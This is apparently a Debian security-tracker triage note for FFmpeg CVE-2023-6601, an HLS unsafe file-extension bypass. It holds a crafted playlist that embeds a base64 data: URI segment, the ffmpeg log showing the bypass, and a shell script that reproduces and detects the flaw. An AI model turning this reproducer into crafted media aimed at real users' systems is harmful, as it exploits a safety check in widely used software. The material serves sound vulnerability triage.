Update CVE-2023-6601/ffmpeg triaging, bookworm and bullseye affected

Initially the vulnerability was marked as fixed by 91d96dc, but upstream marked d09f50c as fixing it. After going through the description and reproducer, d09f50c indeed fixes the CVE. This commit was never cherry-picked into the upstream patch releases of 5.1 or 4.3, so both bookworm and bullseye are vulnerable.

To reproduce the vulnerability in bullseye or bookworm, the following steps can be used:

$ cat >cve-2023-6601.mp4 <<EOF
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1,
data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8
#EXT-X-ENDLIST
EOF
$ ffmpeg -i cve-2023-6601.mp4  output.mp4
ffmpeg version 5.1.8-0+deb12u1 Copyright (c) 2000-2025 the FFmpeg developers
  built with gcc 12 (Debian 12.2.0-14+deb12u1)
  [...]
  libavutil      57. 28.100 / 57. 28.100
  libavcodec     59. 37.100 / 59. 37.100
  libavformat    59. 27.100 / 59. 27.100
  libavdevice    59.  7.100 / 59.  7.100
  libavfilter     8. 44.100 /  8. 44.100
  libswscale      6.  7.100 /  6.  7.100
  libswresample   4.  7.100 /  4.  7.100
  libpostproc    56.  6.100 / 56.  6.100
[hls @ 0x55756f63a840] Opening 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8' for reading
[hls @ 0x55756f63a840] detected format xbin extension none mismatches allowed extensions in url data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8
[hls @ 0x55756f63a840] Error when loading first segment 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8'
./cve-2023-6601.mp4: Invalid data found when processing input

The line Opening 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8' for reading is the same evidence as the one described in section I (HLS Unsafe File Extension Bypass) of the bug report: https://bugzilla.redhat.com/show_bug.cgi?id=2253172#c0
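The reproduction above can be turned into a repeatable triage check. The script below is an added example written for this page, not code from the merge request or from FFmpeg: it writes the same playlist, runs ffmpeg on it, and classifies the build as vulnerable only if the hls demuxer logged that it opened the data: URI segment, which is the evidence the bug report relies on. It assumes ffmpeg is on PATH for the live run; the classifier itself only reads log text, so it can also be pointed at a saved ffmpeg stderr.

```shell
#!/bin/sh
# Added triage helper for CVE-2023-6601 (not from the MR or from FFmpeg).
# Assumptions: ffmpeg on PATH for run_check; POSIX sh, grep, mktemp.
set -u

PLAYLIST=cve-2023-6601.mp4

# Write the reproducer playlist from the MR: an HLS playlist whose only
# segment is a data: URI carrying an XBIN header, so the probed format
# (xbin) does not match the .m3u8 extension that the URL claims.
write_playlist() {
  cat >"$1" <<'EOF'
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1,
data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8
#EXT-X-ENDLIST
EOF
}

# Read ffmpeg's stderr on stdin. Exit 0 (vulnerable) if the hls demuxer
# reported opening a data: URI as a segment, 1 otherwise. The later
# "Invalid data found" error is irrelevant: the unsafe open already happened.
classify_ffmpeg_log() {
  grep -q "^\[hls @ [^]]*] Opening 'data://"
}

# Build the playlist, run ffmpeg with no interactive stdin, and classify.
# Returns 0 when the vulnerable behaviour is reproduced.
run_check() {
  write_playlist "$PLAYLIST"
  if ffmpeg -nostdin -hide_banner -i "$PLAYLIST" -f null - 2>&1 | classify_ffmpeg_log; then
    echo "VULNERABLE: hls demuxer opened the data: segment from $PLAYLIST"
    return 0
  fi
  echo "not reproduced: hls demuxer did not open the data: segment"
  return 1
}

# Only run the live check where ffmpeg is actually installed.
if command -v ffmpeg >/dev/null 2>&1; then
  run_check
fi
```

On the bookworm build quoted above the live run prints the VULNERABLE line; on a build carrying d09f50c the Opening 'data://...' message should be absent and the check returns 1. Running the script with ffmpeg absent exercises nothing, so confirm `command -v ffmpeg` first when scripting this across chroots.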
